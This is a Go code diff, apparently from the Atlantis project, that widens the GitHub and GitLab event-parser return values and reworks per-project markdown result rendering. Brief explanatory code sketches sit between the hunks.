- BaseRepo: baseRepoModel,
- }, headRepoModel, nil
+ BaseRepo: baseRepo,
+ }
+ return
}
func (e *EventParser) ParseGithubRepo(ghRepo *github.Repository) (models.Repo, error) {
return models.NewRepo(models.Github, ghRepo.GetFullName(), ghRepo.GetCloneURL(), e.GithubUser, e.GithubToken)
}
-func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, error) {
+func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.PullRequest, models.Repo, models.Repo, models.User, error) {
modelState := models.Closed
if event.ObjectAttributes.State == gitlabPullOpened {
modelState = models.Open
@@ -141,7 +231,15 @@ func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul
// GitLab also has a "merged" state, but we map that to Closed so we don't
// need to check for it.
- repo, err := models.NewRepo(models.Gitlab, event.Project.PathWithNamespace, event.Project.GitHTTPURL, e.GitlabUser, e.GitlabToken)
+ baseRepo, err := models.NewRepo(models.Gitlab, event.Project.PathWithNamespace, event.Project.GitHTTPURL, e.GitlabUser, e.GitlabToken)
+ if err != nil {
+ return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, err
+ }
+ headRepo, err := models.NewRepo(models.Gitlab, event.ObjectAttributes.Source.PathWithNamespace, event.ObjectAttributes.Source.GitHTTPURL, e.GitlabUser, e.GitlabToken)
+ if err != nil {
+ return models.PullRequest{}, models.Repo{}, models.Repo{}, models.User{}, err
+ }
+
pull := models.PullRequest{
URL: event.ObjectAttributes.URL,
Author: event.User.Username,
@@ -149,10 +247,14 @@ func (e *EventParser) ParseGitlabMergeEvent(event gitlab.MergeEvent) (models.Pul
HeadCommit: event.ObjectAttributes.LastCommit.ID,
Branch: event.ObjectAttributes.SourceBranch,
State: modelState,
- BaseRepo: repo,
+ BaseRepo: baseRepo,
+ }
+
+ user := models.User{
+ Username: event.User.Username,
}
- return pull, repo, err
+ return pull, baseRepo, headRepo, user, err
}
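Call sites of the widened signature now receive the head repo and user as well; roughly:

// Sketch of a caller handling the new return values.
pull, baseRepo, headRepo, user, err := parser.ParseGitlabMergeEvent(event)
if err != nil {
	return err
}
// pull.BaseRepo equals baseRepo; headRepo points at the source project for
// cross-repo MRs, and user is built from event.User.Username.
_, _, _, _ = pull, baseRepo, headRepo, user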
// ParseGitlabMergeCommentEvent creates Atlantis models out of a GitLab event.
diff --git a/server/events/event_parser_test.go b/server/events/event_parser_test.go
index 9928dc69c9..edecf5874d 100644
--- a/server/events/event_parser_test.go
+++ b/server/events/event_parser_test.go
@@ -102,34 +102,91 @@ func TestParseGithubIssueCommentEvent(t *testing.T) {
Equals(t, *comment.Issue.Number, pullNum)
}
+func TestParseGithubPullEvent(t *testing.T) {
+ _, _, _, _, err := parser.ParseGithubPullEvent(&github.PullRequestEvent{})
+ ErrEquals(t, "pull_request is null", err)
+
+ testEvent := deepcopy.Copy(PullEvent).(github.PullRequestEvent)
+ testEvent.PullRequest.HTMLURL = nil
+ _, _, _, _, err = parser.ParseGithubPullEvent(&testEvent)
+ ErrEquals(t, "html_url is null", err)
+
+ testEvent = deepcopy.Copy(PullEvent).(github.PullRequestEvent)
+ testEvent.Sender = nil
+ _, _, _, _, err = parser.ParseGithubPullEvent(&testEvent)
+ ErrEquals(t, "sender is null", err)
+
+ testEvent = deepcopy.Copy(PullEvent).(github.PullRequestEvent)
+ testEvent.Sender.Login = nil
+ _, _, _, _, err = parser.ParseGithubPullEvent(&testEvent)
+ ErrEquals(t, "sender.login is null", err)
+
+ actPull, actBaseRepo, actHeadRepo, actUser, err := parser.ParseGithubPullEvent(&PullEvent)
+ Ok(t, err)
+ expBaseRepo := models.Repo{
+ Owner: "owner",
+ FullName: "owner/repo",
+ CloneURL: "https://github-user:github-token@github.com/owner/repo.git",
+ SanitizedCloneURL: Repo.GetCloneURL(),
+ Name: "repo",
+ VCSHost: models.VCSHost{
+ Hostname: "github.com",
+ Type: models.Github,
+ },
+ }
+ Equals(t, expBaseRepo, actBaseRepo)
+ Equals(t, expBaseRepo, actHeadRepo)
+ Equals(t, models.PullRequest{
+ URL: Pull.GetHTMLURL(),
+ Author: Pull.User.GetLogin(),
+ Branch: Pull.Head.GetRef(),
+ HeadCommit: Pull.Head.GetSHA(),
+ Num: Pull.GetNumber(),
+ State: models.Open,
+ BaseRepo: expBaseRepo,
+ }, actPull)
+ Equals(t, models.User{Username: "user"}, actUser)
+}
+
func TestParseGithubPull(t *testing.T) {
testPull := deepcopy.Copy(Pull).(github.PullRequest)
testPull.Head.SHA = nil
- _, _, err := parser.ParseGithubPull(&testPull)
+ _, _, _, err := parser.ParseGithubPull(&testPull)
ErrEquals(t, "head.sha is null", err)
testPull = deepcopy.Copy(Pull).(github.PullRequest)
testPull.HTMLURL = nil
- _, _, err = parser.ParseGithubPull(&testPull)
+ _, _, _, err = parser.ParseGithubPull(&testPull)
ErrEquals(t, "html_url is null", err)
testPull = deepcopy.Copy(Pull).(github.PullRequest)
testPull.Head.Ref = nil
- _, _, err = parser.ParseGithubPull(&testPull)
+ _, _, _, err = parser.ParseGithubPull(&testPull)
ErrEquals(t, "head.ref is null", err)
testPull = deepcopy.Copy(Pull).(github.PullRequest)
testPull.User.Login = nil
- _, _, err = parser.ParseGithubPull(&testPull)
+ _, _, _, err = parser.ParseGithubPull(&testPull)
ErrEquals(t, "user.login is null", err)
testPull = deepcopy.Copy(Pull).(github.PullRequest)
testPull.Number = nil
- _, _, err = parser.ParseGithubPull(&testPull)
+ _, _, _, err = parser.ParseGithubPull(&testPull)
ErrEquals(t, "number is null", err)
- pullRes, _, err := parser.ParseGithubPull(&Pull)
+ pullRes, actBaseRepo, actHeadRepo, err := parser.ParseGithubPull(&Pull)
Ok(t, err)
+ expBaseRepo := models.Repo{
+ Owner: "owner",
+ FullName: "owner/repo",
+ CloneURL: "https://github-user:github-token@github.com/owner/repo.git",
+ SanitizedCloneURL: Repo.GetCloneURL(),
+ Name: "repo",
+ VCSHost: models.VCSHost{
+ Hostname: "github.com",
+ Type: models.Github,
+ },
+ }
Equals(t, models.PullRequest{
URL: Pull.GetHTMLURL(),
Author: Pull.User.GetLogin(),
@@ -137,18 +194,10 @@ func TestParseGithubPull(t *testing.T) {
HeadCommit: Pull.Head.GetSHA(),
Num: Pull.GetNumber(),
State: models.Open,
- BaseRepo: models.Repo{
- Owner: "owner",
- FullName: "owner/repo",
- CloneURL: "https://github-user:github-token@github.com/owner/repo.git",
- SanitizedCloneURL: Repo.GetCloneURL(),
- Name: "repo",
- VCSHost: models.VCSHost{
- Hostname: "github.com",
- Type: models.Github,
- },
- },
+ BaseRepo: expBaseRepo,
}, pullRes)
+ Equals(t, expBaseRepo, actBaseRepo)
+ Equals(t, expBaseRepo, actHeadRepo)
}
func TestParseGitlabMergeEvent(t *testing.T) {
@@ -156,10 +205,10 @@ func TestParseGitlabMergeEvent(t *testing.T) {
var event *gitlab.MergeEvent
err := json.Unmarshal([]byte(mergeEventJSON), &event)
Ok(t, err)
- pull, repo, err := parser.ParseGitlabMergeEvent(*event)
+ pull, actBaseRepo, actHeadRepo, actUser, err := parser.ParseGitlabMergeEvent(*event)
Ok(t, err)
- expRepo := models.Repo{
+ expBaseRepo := models.Repo{
FullName: "gitlabhq/gitlab-test",
Name: "gitlab-test",
SanitizedCloneURL: "https://example.com/gitlabhq/gitlab-test.git",
@@ -178,14 +227,26 @@ func TestParseGitlabMergeEvent(t *testing.T) {
HeadCommit: "da1560886d4f094c3e6c9ef40349f7d38b5d27d7",
Branch: "ms-viewport",
State: models.Open,
- BaseRepo: expRepo,
+ BaseRepo: expBaseRepo,
}, pull)
- Equals(t, expRepo, repo)
+ Equals(t, expBaseRepo, actBaseRepo)
+ Equals(t, models.Repo{
+ FullName: "awesome_space/awesome_project",
+ Name: "awesome_project",
+ SanitizedCloneURL: "http://example.com/awesome_space/awesome_project.git",
+ Owner: "awesome_space",
+ CloneURL: "http://gitlab-user:gitlab-token@example.com/awesome_space/awesome_project.git",
+ VCSHost: models.VCSHost{
+ Hostname: "example.com",
+ Type: models.Gitlab,
+ },
+ }, actHeadRepo)
+ Equals(t, models.User{Username: "root"}, actUser)
t.Log("If the state is closed, should set field correctly.")
event.ObjectAttributes.State = "closed"
- pull, _, err = parser.ParseGitlabMergeEvent(*event)
+ pull, _, _, _, err = parser.ParseGitlabMergeEvent(*event)
Ok(t, err)
Equals(t, models.Closed, pull.State)
}
@@ -257,6 +318,101 @@ func TestParseGitlabMergeCommentEvent(t *testing.T) {
}, user)
}
+func TestNewCommand_CleansDir(t *testing.T) {
+ cases := []struct {
+ RepoRelDir string
+ ExpDir string
+ }{
+ {
+ "",
+ ".",
+ },
+ {
+ "/",
+ ".",
+ },
+ {
+ "./",
+ ".",
+ },
+ // We rely on our callers to not pass in dirs that traverse outside the repo root, e.g. "..".
+ {
+ "..",
+ "..",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.RepoRelDir, func(t *testing.T) {
+ cmd := events.NewCommentCommand(c.RepoRelDir, nil, events.Plan, false, "workspace", "")
+ Equals(t, c.ExpDir, cmd.RepoRelDir)
+ })
+ }
+}
+
+func TestNewCommand_EmptyWorkspace(t *testing.T) {
+ cmd := events.NewCommentCommand("dir", nil, events.Plan, false, "", "")
+ Equals(t, "default", cmd.Workspace)
+}
+
+func TestNewCommand_AllFieldsSet(t *testing.T) {
+ cmd := events.NewCommentCommand("dir", []string{"a", "b"}, events.Plan, true, "workspace", "project")
+ Equals(t, events.CommentCommand{
+ Workspace: "workspace",
+ RepoRelDir: "dir",
+ Verbose: true,
+ Flags: []string{"a", "b"},
+ Name: events.Plan,
+ ProjectName: "project",
+ }, *cmd)
+}
+
+func TestAutoplanCommand_CommandName(t *testing.T) {
+ Equals(t, events.Plan, (events.AutoplanCommand{}).CommandName())
+}
+
+func TestAutoplanCommand_IsVerbose(t *testing.T) {
+ Equals(t, false, (events.AutoplanCommand{}).IsVerbose())
+}
+
+func TestAutoplanCommand_IsAutoplan(t *testing.T) {
+ Equals(t, true, (events.AutoplanCommand{}).IsAutoplan())
+}
+
+func TestCommentCommand_CommandName(t *testing.T) {
+ Equals(t, events.Plan, (events.CommentCommand{
+ Name: events.Plan,
+ }).CommandName())
+ Equals(t, events.Apply, (events.CommentCommand{
+ Name: events.Apply,
+ }).CommandName())
+}
+
+func TestCommentCommand_IsVerbose(t *testing.T) {
+ Equals(t, false, (events.CommentCommand{
+ Verbose: false,
+ }).IsVerbose())
+ Equals(t, true, (events.CommentCommand{
+ Verbose: true,
+ }).IsVerbose())
+}
+
+func TestCommentCommand_IsAutoplan(t *testing.T) {
+ Equals(t, false, (events.CommentCommand{}).IsAutoplan())
+}
+
+func TestCommentCommand_String(t *testing.T) {
+ exp := `command="plan" verbose=true dir="mydir" workspace="myworkspace" project="myproject" flags="flag1,flag2"`
+ Equals(t, exp, (events.CommentCommand{
+ RepoRelDir: "mydir",
+ Flags: []string{"flag1", "flag2"},
+ Name: events.Plan,
+ Verbose: true,
+ Workspace: "myworkspace",
+ ProjectName: "myproject",
+ }).String())
+}
+
var mergeEventJSON = `{
"object_kind": "merge_request",
"user": {
diff --git a/server/events/executor.go b/server/events/executor.go
deleted file mode 100644
index 10df87a764..0000000000
--- a/server/events/executor.go
+++ /dev/null
@@ -1,22 +0,0 @@
-// Copyright 2017 HootSuite Media Inc.
-//
-// Licensed under the Apache License, Version 2.0 (the License);
-// you may not use this file except in compliance with the License.
-// You may obtain a copy of the License at
-// http://www.apache.org/licenses/LICENSE-2.0
-// Unless required by applicable law or agreed to in writing, software
-// distributed under the License is distributed on an AS IS BASIS,
-// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-// See the License for the specific language governing permissions and
-// limitations under the License.
-// Modified hereafter by contributors to runatlantis/atlantis.
-//
-package events
-
-//go:generate pegomock generate -m --use-experimental-model-gen --package mocks -o mocks/mock_executor.go Executor
-
-// Executor is the generic interface implemented by each command type:
-// help, plan, and apply.
-type Executor interface {
- Execute(ctx *CommandContext) CommandResponse
-}
diff --git a/server/events/markdown_renderer.go b/server/events/markdown_renderer.go
index 978cc7776a..d21a683d70 100644
--- a/server/events/markdown_renderer.go
+++ b/server/events/markdown_renderer.go
@@ -18,6 +18,8 @@ import (
"fmt"
"strings"
"text/template"
+
+ "github.com/Masterminds/sprig"
)
// MarkdownRenderer renders responses as markdown.
@@ -44,13 +46,19 @@ type FailureData struct {
// ResultData is data about a successful response.
type ResultData struct {
- Results map[string]string
+ Results []ProjectResultTmplData
CommonData
}
+type ProjectResultTmplData struct {
+ Workspace string
+ RepoRelDir string
+ Rendered string
+}
+
// Render formats the data into a markdown string.
// nolint: interfacer
-func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log string, verbose bool) string {
+func (m *MarkdownRenderer) Render(res CommandResult, cmdName CommandName, log string, verbose bool, autoplan bool) string {
commandStr := strings.Title(cmdName.String())
common := CommonData{commandStr, verbose, log}
if res.Error != nil {
@@ -59,14 +67,22 @@ func (m *MarkdownRenderer) Render(res CommandResponse, cmdName CommandName, log
if res.Failure != "" {
return m.renderTemplate(failureWithLogTmpl, FailureData{res.Failure, common})
}
+ if len(res.ProjectResults) == 0 && autoplan {
+ return m.renderTemplate(autoplanNoProjectsWithLogTmpl, common)
+ }
return m.renderProjectResults(res.ProjectResults, common)
}
-func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, common CommonData) string {
- results := make(map[string]string)
- for _, result := range pathResults {
+func (m *MarkdownRenderer) renderProjectResults(results []ProjectResult, common CommonData) string {
+ var resultsTmplData []ProjectResultTmplData
+
+ for _, result := range results {
+ resultData := ProjectResultTmplData{
+ Workspace: result.Workspace,
+ RepoRelDir: result.RepoRelDir,
+ }
if result.Error != nil {
- results[result.Path] = m.renderTemplate(errTmpl, struct {
+ resultData.Rendered = m.renderTemplate(errTmpl, struct {
Command string
Error string
}{
@@ -74,7 +90,7 @@ func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, com
Error: result.Error.Error(),
})
} else if result.Failure != "" {
- results[result.Path] = m.renderTemplate(failureTmpl, struct {
+ resultData.Rendered = m.renderTemplate(failureTmpl, struct {
Command string
Failure string
}{
@@ -82,21 +98,22 @@ func (m *MarkdownRenderer) renderProjectResults(pathResults []ProjectResult, com
Failure: result.Failure,
})
} else if result.PlanSuccess != nil {
- results[result.Path] = m.renderTemplate(planSuccessTmpl, *result.PlanSuccess)
+ resultData.Rendered = m.renderTemplate(planSuccessTmpl, *result.PlanSuccess)
} else if result.ApplySuccess != "" {
- results[result.Path] = m.renderTemplate(applySuccessTmpl, struct{ Output string }{result.ApplySuccess})
+ resultData.Rendered = m.renderTemplate(applySuccessTmpl, struct{ Output string }{result.ApplySuccess})
} else {
- results[result.Path] = "Found no template. This is a bug!"
+ resultData.Rendered = "Found no template. This is a bug!"
}
+ resultsTmplData = append(resultsTmplData, resultData)
}
var tmpl *template.Template
- if len(results) == 1 {
+ if len(resultsTmplData) == 1 {
tmpl = singleProjectTmpl
} else {
tmpl = multiProjectTmpl
}
- return m.renderTemplate(tmpl, ResultData{results, common})
+ return m.renderTemplate(tmpl, ResultData{resultsTmplData, common})
}
func (m *MarkdownRenderer) renderTemplate(tmpl *template.Template, data interface{}) string {
@@ -107,15 +124,15 @@ func (m *MarkdownRenderer) renderTemplate(tmpl *template.Template, data interfac
return buf.String()
}
-var singleProjectTmpl = template.Must(template.New("").Parse("{{ range $result := .Results }}{{$result}}{{end}}\n" + logTmpl))
-var multiProjectTmpl = template.Must(template.New("").Parse(
- "Ran {{.Command}} in {{ len .Results }} directories:\n" +
- "{{ range $path, $result := .Results }}" +
- " * `{{$path}}`\n" +
+var singleProjectTmpl = template.Must(template.New("").Parse("{{$result := index .Results 0}}Ran {{.Command}} in dir: `{{$result.RepoRelDir}}` workspace: `{{$result.Workspace}}`\n{{$result.Rendered}}\n" + logTmpl))
+var multiProjectTmpl = template.Must(template.New("").Funcs(sprig.TxtFuncMap()).Parse(
+ "Ran {{.Command}} for {{ len .Results }} projects:\n" +
+ "{{ range $result := .Results }}" +
+ "1. workspace: `{{$result.Workspace}}` dir: `{{$result.RepoRelDir}}`\n" +
"{{end}}\n" +
- "{{ range $path, $result := .Results }}" +
- "## {{$path}}/\n" +
- "{{$result}}\n" +
+ "{{ range $i, $result := .Results }}" +
+ "### {{add $i 1}}. workspace: `{{$result.Workspace}}` dir: `{{$result.RepoRelDir}}`\n" +
+ "{{$result.Rendered}}\n" +
"---\n{{end}}" +
logTmpl))
var planSuccessTmpl = template.Must(template.New("").Parse(
@@ -131,9 +148,11 @@ var errTmplText = "**{{.Command}} Error**\n" +
"```\n" +
"{{.Error}}\n" +
"```\n"
+var autoplanNoProjectsTmplText = "Ran `plan` in 0 projects because Atlantis detected no Terraform changes or could not determine where to run `plan`.\n"
var errTmpl = template.Must(template.New("").Parse(errTmplText))
var errWithLogTmpl = template.Must(template.New("").Parse(errTmplText + logTmpl))
var failureTmplText = "**{{.Command}} Failed**: {{.Failure}}\n"
var failureTmpl = template.Must(template.New("").Parse(failureTmplText))
var failureWithLogTmpl = template.Must(template.New("").Parse(failureTmplText + logTmpl))
+var autoplanNoProjectsWithLogTmpl = template.Must(template.New("").Parse(autoplanNoProjectsTmplText + logTmpl))
var logTmpl = "{{if .Verbose}}\n<details><summary>Log</summary>\n  <p>\n\n```\n{{.Log}}```\n</p></details>{{end}}\n"
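To tie the new Render signature together, a sketch of the autoplan-with-no-projects path; the expected output matches the assertion in markdown_renderer_test.go below:

r := MarkdownRenderer{}
res := CommandResult{} // no error, no failure, no project results
out := r.Render(res, Plan, "", false, true) // verbose=false, autoplan=true
// out == "Ran `plan` in 0 projects because Atlantis detected no Terraform
// changes or could not determine where to run `plan`.\n\n"
_ = out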
diff --git a/server/events/markdown_renderer_test.go b/server/events/markdown_renderer_test.go
index 287996ea44..88c19ad1fc 100644
--- a/server/events/markdown_renderer_test.go
+++ b/server/events/markdown_renderer_test.go
@@ -45,18 +45,20 @@ func TestRenderErr(t *testing.T) {
r := events.MarkdownRenderer{}
for _, c := range cases {
- res := events.CommandResponse{
- Error: c.Error,
- }
- for _, verbose := range []bool{true, false} {
- t.Log("testing " + c.Description)
- s := r.Render(res, c.Command, "log", verbose)
- if !verbose {
- Equals(t, c.Expected, s)
- } else {
- Equals(t, c.Expected+"<details><summary>Log</summary>\n  <p>\n\n```\nlog```\n</p></details>\n", s)
+ t.Run(c.Description, func(t *testing.T) {
+ res := events.CommandResult{
+ Error: c.Error,
}
- }
+ for _, verbose := range []bool{true, false} {
+ t.Log("testing " + c.Description)
+ s := r.Render(res, c.Command, "log", verbose, false)
+ if !verbose {
+ Equals(t, c.Expected, s)
+ } else {
+ Equals(t, c.Expected+"<details><summary>Log</summary>\n  <p>\n\n```\nlog```\n</p></details>\n", s)
+ }
+ }
+ })
}
}
@@ -83,32 +85,43 @@ func TestRenderFailure(t *testing.T) {
r := events.MarkdownRenderer{}
for _, c := range cases {
- res := events.CommandResponse{
- Failure: c.Failure,
- }
- for _, verbose := range []bool{true, false} {
- t.Log("testing " + c.Description)
- s := r.Render(res, c.Command, "log", verbose)
- if !verbose {
- Equals(t, c.Expected, s)
- } else {
- Equals(t, c.Expected+"<details><summary>Log</summary>\n  <p>\n\n```\nlog```\n</p></details>\n", s)
+ t.Run(c.Description, func(t *testing.T) {
+ res := events.CommandResult{
+ Failure: c.Failure,
+ }
+ for _, verbose := range []bool{true, false} {
+ t.Log("testing " + c.Description)
+ s := r.Render(res, c.Command, "log", verbose, false)
+ if !verbose {
+ Equals(t, c.Expected, s)
+ } else {
+ Equals(t, c.Expected+"<details><summary>Log</summary>\n  <p>\n\n```\nlog```\n</p></details>\n", s)
+ }
}
- }
+ })
}
}
func TestRenderErrAndFailure(t *testing.T) {
t.Log("if there is an error and a failure, the error should be printed")
r := events.MarkdownRenderer{}
- res := events.CommandResponse{
+ res := events.CommandResult{
Error: errors.New("error"),
Failure: "failure",
}
- s := r.Render(res, events.Plan, "", false)
+ s := r.Render(res, events.Plan, "", false, false)
Equals(t, "**Plan Error**\n```\nerror\n```\n\n", s)
}
+func TestRenderAutoplanNoResults(t *testing.T) {
+ // If there are no project results during an autoplan we should still comment
+ // back because the user might expect some output.
+ r := events.MarkdownRenderer{}
+ res := events.CommandResult{}
+ s := r.Render(res, events.Plan, "", false, true)
+ Equals(t, "Ran `plan` in 0 projects because Atlantis detected no Terraform changes or could not determine where to run `plan`.\n\n", s)
+}
+
func TestRenderProjectResults(t *testing.T) {
cases := []struct {
Description string
@@ -121,136 +134,185 @@ func TestRenderProjectResults(t *testing.T) {
events.Plan,
[]events.ProjectResult{
{
- PlanSuccess: &events.PlanSuccess{
- TerraformOutput: "terraform-output",
- LockURL: "lock-url",
+ ProjectCommandResult: events.ProjectCommandResult{
+ PlanSuccess: &events.PlanSuccess{
+ TerraformOutput: "terraform-output",
+ LockURL: "lock-url",
+ },
},
+ Workspace: "workspace",
+ RepoRelDir: "path",
},
},
- "```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n\n",
+ "Ran Plan in dir: `path` workspace: `workspace`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n\n",
},
{
"single successful apply",
events.Apply,
[]events.ProjectResult{
{
- ApplySuccess: "success",
+ ProjectCommandResult: events.ProjectCommandResult{
+ ApplySuccess: "success",
+ },
+ Workspace: "workspace",
+ RepoRelDir: "path",
},
},
- "```diff\nsuccess\n```\n\n",
+ "Ran Apply in dir: `path` workspace: `workspace`\n```diff\nsuccess\n```\n\n",
},
{
"multiple successful plans",
events.Plan,
[]events.ProjectResult{
{
- Path: "path",
- PlanSuccess: &events.PlanSuccess{
- TerraformOutput: "terraform-output",
- LockURL: "lock-url",
+ Workspace: "workspace",
+ RepoRelDir: "path",
+ ProjectCommandResult: events.ProjectCommandResult{
+ PlanSuccess: &events.PlanSuccess{
+ TerraformOutput: "terraform-output",
+ LockURL: "lock-url",
+ },
},
},
{
- Path: "path2",
- PlanSuccess: &events.PlanSuccess{
- TerraformOutput: "terraform-output2",
- LockURL: "lock-url2",
+ Workspace: "workspace",
+ RepoRelDir: "path2",
+ ProjectCommandResult: events.ProjectCommandResult{
+ PlanSuccess: &events.PlanSuccess{
+ TerraformOutput: "terraform-output2",
+ LockURL: "lock-url2",
+ },
},
},
},
- "Ran Plan in 2 directories:\n * `path`\n * `path2`\n\n## path/\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n## path2/\n```diff\nterraform-output2\n```\n\n* To **discard** this plan click [here](lock-url2).\n---\n\n",
+ "Ran Plan for 2 projects:\n1. workspace: `workspace` dir: `path`\n1. workspace: `workspace` dir: `path2`\n\n### 1. workspace: `workspace` dir: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` dir: `path2`\n```diff\nterraform-output2\n```\n\n* To **discard** this plan click [here](lock-url2).\n---\n\n",
},
{
"multiple successful applies",
events.Apply,
[]events.ProjectResult{
{
- Path: "path",
- ApplySuccess: "success",
+ RepoRelDir: "path",
+ Workspace: "workspace",
+ ProjectCommandResult: events.ProjectCommandResult{
+ ApplySuccess: "success",
+ },
},
{
- Path: "path2",
- ApplySuccess: "success2",
+ RepoRelDir: "path2",
+ Workspace: "workspace",
+ ProjectCommandResult: events.ProjectCommandResult{
+ ApplySuccess: "success2",
+ },
},
},
- "Ran Apply in 2 directories:\n * `path`\n * `path2`\n\n## path/\n```diff\nsuccess\n```\n---\n## path2/\n```diff\nsuccess2\n```\n---\n\n",
+ "Ran Apply for 2 projects:\n1. workspace: `workspace` dir: `path`\n1. workspace: `workspace` dir: `path2`\n\n### 1. workspace: `workspace` dir: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` dir: `path2`\n```diff\nsuccess2\n```\n---\n\n",
},
{
"single errored plan",
events.Plan,
[]events.ProjectResult{
{
- Error: errors.New("error"),
+ ProjectCommandResult: events.ProjectCommandResult{
+ Error: errors.New("error"),
+ },
+ RepoRelDir: "path",
+ Workspace: "workspace",
},
},
- "**Plan Error**\n```\nerror\n```\n\n\n",
+ "Ran Plan in dir: `path` workspace: `workspace`\n**Plan Error**\n```\nerror\n```\n\n\n",
},
{
"single failed plan",
events.Plan,
[]events.ProjectResult{
{
- Failure: "failure",
+ RepoRelDir: "path",
+ Workspace: "workspace",
+ ProjectCommandResult: events.ProjectCommandResult{
+ Failure: "failure",
+ },
},
},
- "**Plan Failed**: failure\n\n\n",
+ "Ran Plan in dir: `path` workspace: `workspace`\n**Plan Failed**: failure\n\n\n",
},
{
"successful, failed, and errored plan",
events.Plan,
[]events.ProjectResult{
{
- Path: "path",
- PlanSuccess: &events.PlanSuccess{
- TerraformOutput: "terraform-output",
- LockURL: "lock-url",
+ Workspace: "workspace",
+ RepoRelDir: "path",
+ ProjectCommandResult: events.ProjectCommandResult{
+ PlanSuccess: &events.PlanSuccess{
+ TerraformOutput: "terraform-output",
+ LockURL: "lock-url",
+ },
},
},
{
- Path: "path2",
- Failure: "failure",
+ Workspace: "workspace",
+ RepoRelDir: "path2",
+ ProjectCommandResult: events.ProjectCommandResult{
+ Failure: "failure",
+ },
},
{
- Path: "path3",
- Error: errors.New("error"),
+ Workspace: "workspace",
+ RepoRelDir: "path3",
+ ProjectCommandResult: events.ProjectCommandResult{
+ Error: errors.New("error"),
+ },
},
},
- "Ran Plan in 3 directories:\n * `path`\n * `path2`\n * `path3`\n\n## path/\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n## path2/\n**Plan Failed**: failure\n\n---\n## path3/\n**Plan Error**\n```\nerror\n```\n\n---\n\n",
+ "Ran Plan for 3 projects:\n1. workspace: `workspace` dir: `path`\n1. workspace: `workspace` dir: `path2`\n1. workspace: `workspace` dir: `path3`\n\n### 1. workspace: `workspace` dir: `path`\n```diff\nterraform-output\n```\n\n* To **discard** this plan click [here](lock-url).\n---\n### 2. workspace: `workspace` dir: `path2`\n**Plan Failed**: failure\n\n---\n### 3. workspace: `workspace` dir: `path3`\n**Plan Error**\n```\nerror\n```\n\n---\n\n",
},
{
"successful, failed, and errored apply",
events.Apply,
[]events.ProjectResult{
{
- Path: "path",
- ApplySuccess: "success",
+ Workspace: "workspace",
+ RepoRelDir: "path",
+ ProjectCommandResult: events.ProjectCommandResult{
+ ApplySuccess: "success",
+ },
},
{
- Path: "path2",
- Failure: "failure",
+ Workspace: "workspace",
+ RepoRelDir: "path2",
+ ProjectCommandResult: events.ProjectCommandResult{
+ Failure: "failure",
+ },
},
{
- Path: "path3",
- Error: errors.New("error"),
+ Workspace: "workspace",
+ RepoRelDir: "path3",
+ ProjectCommandResult: events.ProjectCommandResult{
+ Error: errors.New("error"),
+ },
},
},
- "Ran Apply in 3 directories:\n * `path`\n * `path2`\n * `path3`\n\n## path/\n```diff\nsuccess\n```\n---\n## path2/\n**Apply Failed**: failure\n\n---\n## path3/\n**Apply Error**\n```\nerror\n```\n\n---\n\n",
+ "Ran Apply for 3 projects:\n1. workspace: `workspace` dir: `path`\n1. workspace: `workspace` dir: `path2`\n1. workspace: `workspace` dir: `path3`\n\n### 1. workspace: `workspace` dir: `path`\n```diff\nsuccess\n```\n---\n### 2. workspace: `workspace` dir: `path2`\n**Apply Failed**: failure\n\n---\n### 3. workspace: `workspace` dir: `path3`\n**Apply Error**\n```\nerror\n```\n\n---\n\n",
},
}
r := events.MarkdownRenderer{}
for _, c := range cases {
- res := events.CommandResponse{
- ProjectResults: c.ProjectResults,
- }
- for _, verbose := range []bool{true, false} {
- t.Log("testing " + c.Description)
- s := r.Render(res, c.Command, "log", verbose)
- if !verbose {
- Equals(t, c.Expected, s)
- } else {
- Equals(t, c.Expected+"<details><summary>Log</summary>\n  <p>\n\n```\nlog```\n</p></details>\n", s)
+ t.Run(c.Description, func(t *testing.T) {
+ res := events.CommandResult{
+ ProjectResults: c.ProjectResults,
+ }
+ for _, verbose := range []bool{true, false} {
+ t.Run(c.Description, func(t *testing.T) {
+ s := r.Render(res, c.Command, "log", verbose, false)
+ if !verbose {
+ Equals(t, c.Expected, s)
+ } else {
+ Equals(t, c.Expected+"<details><summary>Log</summary>\n  <p>\n\n```\nlog```\n</p></details>\n", s)
+ }
+ })
}
- }
+ })
}
}
diff --git a/server/events/mocks/matchers/events_commandname.go b/server/events/mocks/matchers/events_commandname.go
new file mode 100644
index 0000000000..448c937abc
--- /dev/null
+++ b/server/events/mocks/matchers/events_commandname.go
@@ -0,0 +1,20 @@
+package matchers
+
+import (
+ "reflect"
+
+ "github.com/petergtz/pegomock"
+ events "github.com/runatlantis/atlantis/server/events"
+)
+
+func AnyEventsCommandName() events.CommandName {
+ pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.CommandName))(nil)).Elem()))
+ var nullValue events.CommandName
+ return nullValue
+}
+
+func EqEventsCommandName(value events.CommandName) events.CommandName {
+ pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value})
+ var nullValue events.CommandName
+ return nullValue
+}
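These generated matchers slot into pegomock verifications once any argument needs matching. A sketch, where mockUpdater is assumed to be a pegomock mock of CommitStatusUpdater and the Any* matchers for the other parameter types are assumed to have been generated alongside this one:

// Verify Update was invoked with exactly events.Plan, ignoring the other args.
// Once one argument uses a matcher, pegomock requires matchers for all of them.
mockUpdater.VerifyWasCalledOnce().Update(
	matchers.AnyModelsRepo(),
	matchers.AnyModelsPullRequest(),
	matchers.AnyVcsCommitStatus(),
	matchers.EqEventsCommandName(events.Plan),
)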
